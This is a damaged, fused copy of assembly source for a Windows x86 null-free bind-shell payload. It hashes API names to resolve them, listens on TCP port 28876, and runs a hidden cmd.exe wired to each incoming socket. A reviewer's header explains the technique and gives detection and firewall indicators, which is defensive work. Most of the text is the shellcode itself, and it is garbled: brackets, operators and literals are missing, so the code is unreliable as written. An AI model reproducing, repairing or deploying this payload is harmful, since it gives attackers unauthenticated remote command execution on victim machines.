; ---------------------------------------------------------------------------
; Review notes on this listing (NASM syntax, BITS 32).
;
; This is a lossy copy taken from a document-sharing site, not the original
; source file: every original line has been fused into the numbered
; paragraphs below (the leading "1、", "2、" ... numerals are the site's
; pagination, not part of the code), and the copy appears to have dropped the
; `[...]` memory-operand brackets (e.g. "MOV ESI, ESI + 0x1C", "MOV ESI, ESI"),
; the shift operators inside the B2W/W2DW/B2DW macros ("(b2) 8) + (b1)"),
; the character literals in the B2DW pushes ("B2DW(c, m, d, )"), and the
; URLs after "(See". It will not assemble as shown; it is left unrepaired
; and kept only as a documented reference of the technique.
;
; What the listing itself states the payload does (all of it is spelled out
; in the author's own comments below):
;   * Finds kernel32 by walking PEB->Ldr.InInitOrder and comparing the
;     module-name length rather than the name itself (next_module loop), so
;     it is independent of the Windows version / service pack.
;   * Resolves every API it needs by hashing export names in place
;     (hash_loop: XOR AL with hash_xor_value 0x71, SUB into AH starting from
;     hash_start_value 0x36) and comparing against the per-function hash
;     constants defined at the top, instead of importing them.
;   * LoadLibraryA("ws2_32"), WSAStartup, WSASocketA, then bind/listen/accept
;     driven by one call_loop on TCP port `port` (28876 in this copy; the
;     %if at the top only rejects ports whose negated value contains a NUL).
;   * For every accepted connection it calls CreateProcessA with the command
;     line "cmd", STARTF_USESTDHANDLES, hStdInput/hStdOutput/hStdError all
;     set to the accepted socket, bInheritHandles = TRUE and
;     CREATE_NO_WINDOW, then jumps back to accept_loop, so any number of
;     consecutive connections are served and no console window is shown.
;
; Points a defender can take from the above:
;   * The host-visible signature is a process that does not normally listen
;     suddenly owning a listening TCP socket, followed by cmd.exe children
;     whose three standard handles are socket objects rather than console
;     handles and which were created with CREATE_NO_WINDOW. That parent/
;     child/handle pattern is the reliable indicator; the port is a
;     compile-time constant and says nothing on its own.
;   * Because it is a *bind* shell it depends on an unsolicited inbound TCP
;     connection reaching the host; a host firewall that only admits inbound
;     traffic to explicitly published services defeats it regardless of the
;     port chosen.
;   * "DEP/ASLR compatible" in the author's list means only that the payload
;     is position-independent and does not write to its own code; it still
;     has to execute from memory that the delivering vulnerability made
;     executable, so DEP and the usual memory-safety mitigations on the
;     service being exploited remain the primary control.
;   * The export-name hashing scheme (XOR 0x71 / initial 0x36 and the hash
;     constants below) is a usable static signature for this payload family.
; ---------------------------------------------------------------------------
1、 Windows x86 null-free bindshell for Windows 5.0-7.0 all service packsBITS 32; Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs.; (See ; Based largely on code and ideas (C) 2005 by Dafydd Stuttard, NGS Software.; (See ; Thanks to Pete Beck.; Features both in this and the origina
2、l code:; + NULL Free; + Windows version and service pack independant.; Improvements of this code over the original:; + No assumptions are made about the values of registers.; + /3GB compatible: pointers are not assume to be smaller than 0x80000000.; + DEP/ASLR compatible: data is not executed, code
3、is not modified.; + Windows 7 compatible: kernel32 is found based on the length of its name.; + Stealth: does not display a console windows on the target machine when ; cmd.exe is executed.; + Allows an unlimited number of consecutive connections.; + Can except connections on almost any port. The ra
4、nge of acceptable port; numbers is only limited by the fact that the negative value of the port; number must not contain nulls.port equ 28876 ; The port number to bind to.%if (-port & 0xFF) = 0) | (-port & 0xFF00 = 0) %error The given port number would result in NULLs in the code :(%endifAF_INET equ
5、 2; These hashes are calculated with a separate tool.hash_xor_value equ 0x71hash_start_value equ 0x36hash_kernel32_CreateProcessA equ 0xB7hash_kernel32_LoadLibraryA equ 0x8Fhash_ws2_32_WSAStartup equ 0x09hash_ws2_32_WSASocketA equ 0x98hash_ws2_32_bind equ 0x66hash_ws2_32_listen equ 0x56hash_ws2_32_a
6、ccept equ 0x77sizeof_proc_address_table equ 7 * 4offset_WSAStartup_in_hash_table equ 2offset_accept_in_hash_table equ 6%define B2W(b1,b2) (b2) 8) + (b1)%define W2DW(w1,w2) (w2) 16) + (w1)%define B2DW(b1,b2,b3,b4) (b4) 24) + (b3) 16) + (b2) Ldr MOV ESI, ESI + 0x1C ; ESI = PEB-Ldr.InInitOrder (first m
7、odule)next_module: MOV EBP, ESI + 0x08 ; EBP = InInitOrderX.base_address MOV EDI, ESI + 0x20 ; EDI = InInitOrderX.module_name (unicode string) MOV ESI, ESI ; ESI = InInitOrderX.flink (next module) CMP EDI + 12*2, CL ; modul JNE next_module ; No: try next module.; Create hash table and ws2_32 (for Lo
8、adLibraryA) on the stack: PUSH ECX ; Stack = 00 00 00 00 PUSH B2DW(2, _, 3, 2) ; Stack = s2_32%if (hash_ws2_32_accept != w) %error The hash for ws2_32.accept is not a w%endif PUSH B2DW(hash_ws2_32_bind, hash_ws2_32_listen, hash_ws2_32_accept, s) ; hash, hash, ws2_32end_of_hash_table_marker equ s PUS
9、H B2DW(hash_kernel32_CreateProcessA, hash_kernel32_LoadLibraryA, hash_ws2_32_WSAStartup, hash_ws2_32_WSASocketA)sizeof_hash_table equ 7 MOV ESI, ESP ; ESI - Hash table; Reserve space for WSADATA MOV CH, 0x3 ; ECX = 0x300 SUB ESP, ECX ; Reserve space for WSADATA; Create a bunch of NULLs on the stack
10、SUB ESP, ECX ; Reserve space for NULLs MOV EDI, ESP ; EDI = &(NULLs) SALC ; AL = 0 REP STOSB ; Prepare arguments for various functions on the stack:; WSASocket(_in int af=2, _in int type=1, _in int protocol=0,; _in LPWSAPROTOCOL_INFO lpProtocolInfo=0, _in GROUP g=0, ; _in DWORD dwFlags=0) ; _in LPWS
11、APROTOCOL_INFO lpProtocolInfo=0 ; _in GROUP g=0 ; _in DWORD dwFlags=0 ; _in int protocol=0 INC ECX ; PUSH ECX ; _in int type = SOCK_STREAM (1) INC ECX ; PUSH ECX ; _in int af = AF_INET (2); WSAStartup(_in WORD wVersionRequested=2, _out LPWSADATA lpWSADATa=stack) PUSH EDI ; _out LPWSADATA lpWSAData =
12、 &(WSADATA) PUSH ECX ; _in WORD wVersionRequested = 2 (2.0); Set up EDI so that a proc addresses table can be created in the NULLs,; followed by sufficient space to store a struct sockaddr_in: SUB EDI, BYTE sizeof_proc_address_table + sizeof_sockaddr_inget_proc_address_loop: MOVSB ; EDI = hash DEC E
13、DI ; Restore EDI; Find the PE header and export and names tables of the module: MOV EBX, EBP + 0x3C ; EBX = &(PE header) MOV EBX, EBP + EBX + 0x78 ; EBX = offset(export table) ADD EBX, EBP ; EBX = &(export table) MOV ECX, EBX + 0x20 ; ECX = offset(names table) ADD ECX, EBP ; ECX = &(names table) PUS
14、H ESI ; Save ESI; Hash each function name and check it against t XOR EDX, EDX ; EDX = function number (0)next_function_loop:; Get the next function name: INC EDX ; Increment function number MOV ESI, ECX + EDX * 4 ; ESI = offset(function name) ADD ESI, EBP ; ESI = &(function name) MOV AH, hash_start_
15、value ; Initialize the hashhash_loop:; Hash the function name: LODSB ; Load a character of the function name XOR AL, hash_xor_value ; Calculate a hash SUB AH, AL ; CMP AL, hash_xor_value ; Is this the terminating 0 byte? JNE hash_loop ; No: continue hashing CMP AH, EDI ; Yes: Does the hash match ?;
16、Check if the hash matches and loop if not: JNZ next_function_loop POP ESI ; Restore ESI; Find the address of the requested function: MOV ECX, EBX + 0x24 ; ECX = offset ordinals table ADD ECX, EBP ; ECX = &oridinals table MOVZX EDX, WORD ECX + 2 * EDX ; EDX = ordinal number of function MOV ECX, EBX +
17、 0x1C ; ECX = offset address table ADD ECX, EBP ; ECX = &address table MOV EAX, EBP ; EAX = &(module) ADD EAX, ECX + 4 * EDX ; EAX = &(function); Save the address of the requested function: STOSD ; Save proc address; When needed, call LoadLibraryA to start looking for ws2_32.dll functions: CMP BYTE
18、ESI, hash_ws2_32_WSAStartup ; We just found LoadLibraryA JNE skip_load_library ; LEA EBX, ESI - offset_WSAStartup_in_hash_table + offset_accept_in_hash_table PUSH EBX ; _in LPCTSTR lpFileName = &(ws2_32) CALL EAX ; LoadLibraryA(&ws2_32) PUSH EDI ; Save proc address tableWSAStartup XCHG EAX, EBP ; EB
19、P = &(ws2_32.dll)skip_load_library:; Continue until all hashes have been found: CMP BYTE ESI, end_of_hash_table_marker JNE get_proc_address_loop ; POP ESI; Call WSAStartup (Arguments are already on the stack) LODSD CALL EAX ; WSASTARTUP; Call WSASocket (Arguments are already on the stack) LODSD CALL
20、 EAX XCHG EAX, EBP ; EBP = Server socket; Create a struct sockaddr_in on the stack for use by bind()sizeof_sockaddr_in equ 2 + 2 + 4 + 8 SUB DWORD EDI, -W2DW( AF_INET, B2W(port 8, port & 0xFF); sin_family = AF_INET, sin_port = (port, little endian!); Set up the 2nd and 3rd argument for bind:; bind(_
21、in SOCKET s=(added later), _in const struct sockaddr *name, _in int namelen) PUSH BYTE 0 PUSH EDI ; _in const struct sockaddr *name = &(sockaddr_in); bind(), listen() and accept() all take the server socket as their first; argument. listen() and accept() only need NULLs for the remaining arguments;
22、and the arguments for bind() are already on the stack. Because bind() and ; accept() return 0 and listen() returns a socket, which is not 0, a loop can be; used to call them:; listen(_in SOCKET s=(added later), _in int backlog=0); accept(_in SOCKET s=(added later), _in struct sockaddr *addr=0, _inou
23、t int *addrlen=0)call_loop: LODSDaccept_loop: PUSH EBP ; _in SOCKET s = Server socket descriptor CALL EAX; Check if accept() has returned a socket: TEST EAX, EAX JZ call_loop; Create structures on the stack for CreateProcessA; STARTUPINFO ; DWORD cb 00-03: = sizeof(STARTUPINFO); LPTSTR lpReserved 04
24、-07: 0; LPTSTR lpDesktop 08-0B: 0; LPTSTR lpTitle 0C-0F: 0; DWORD dwX 10-13: 0; DWORD dwY 14-17: 0; DWORD dwXSize 18-1B: 0; DWORD dwYSize 1C-1F: 0; DWORD dwXCountChars 20-23: 0; DWORD dwYCountChars 24-27: 0; DWORD dwFillAttribute 28-2B: 0; DWORD dwFlags 2C-2F: (STARTF_USESTD_HANDLES 0x100); WORD wSh
25、owWindow 30-31: 0; WORD cbReserved2 32-33: 0; LPBYTE lpReserved2 34-37: 0; HANDLE hStdInput 38-3B: (Socket descriptor); HANDLE hStdOutput 3C-3F: (Socket descriptor); HANDLE hStdError 40-43: (Socket descriptor); sizeof_STARTUPINFO equ 0x44offset_dwFlags_in_STARTUPINFO equ 0x2Coffset_hStdInput_in_STAR
26、TUPINFO equ 0x38; Each call to accept() removes two DWORDS off the stack. These must be put back; or ESP will run off the stack eventually: XOR EDX, EDX ; EDX = 0 PUSH EDX ; Restore stack #1; Well also create a struct STARTUPINFO PUSH B2DW(c, m, d, ) ; Restore stack #2 and STARTUPINFO.cb = cmd ( 0)
27、LEA EDI, ESP + offset_hStdInput_in_STARTUPINFO; EDI = &(STARTUPINFO.hStdInput) STOSD ; STARTUPINFO.hStdInput = Socket descriptor STOSD ; STARTUPINFO.hStdOutput = Socket descriptor STOSD ; STARTUPINFO.hStdError = Socket descriptor MOV BYTE EDI - sizeof_STARTUPINFO + offset_dwFlags_in_STARTUPINFO + 1,
28、 1 ; STARTUPINFO.dwFlags = STARTF_USESTDHANDLES (0x100); CreateProcess(.) PUSH ESP XCHG ESP, EDI ; _out LPPROCESS_INFORMATION lpProcessInformation = &(STARTUPINFO) + sizeof(STARTUPINFO) PUSH EDI ; _in LPSTARTUPINFO lpStartupInfo = &(STARTUPINFO) PUSH EDX ; _in_opt LPCTSTR lpCurrentDirectory = NULL P
29、USH EDX ; _in_opt LPVOID lpEnvironment = NULL PUSH EDX ; _in DWORD dwCreationFlags = 0 MOV BYTE EDI-5*4+3, 0x8 ; _in DWORD dwCreationFlags = CREATE_NO_WINDOW (0x08000000) PUSH EDI ; _in BOOL bInheritHandles = TRUE (0) PUSH EDX ; _in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes = NULL PUSH EDX ; _in_opt LPSECURITY_ATTRIBUTES lpProcessAttributes = NULL PUSH EDI ; _inout_opt LPTSTR lpCommandLine = &(cmd ) PUSH EDX ; _in_opt LPCTSTR lpApplicationName = NULL CALL ESI - sizeof_proc_address_table; Load accept() into EAX and jump back into our code. MOV EAX, ESI - 4 JMP accept_loop; 2009-07-27
; End of the copied listing. Note that the CreateProcessA call above is the
; last instruction before "MOV EAX, ESI - 4 / JMP accept_loop", i.e. the
; payload never exits on its own: the listening socket stays open until the
; host process is terminated, which is also why the author restores two
; DWORDs to ESP on every iteration.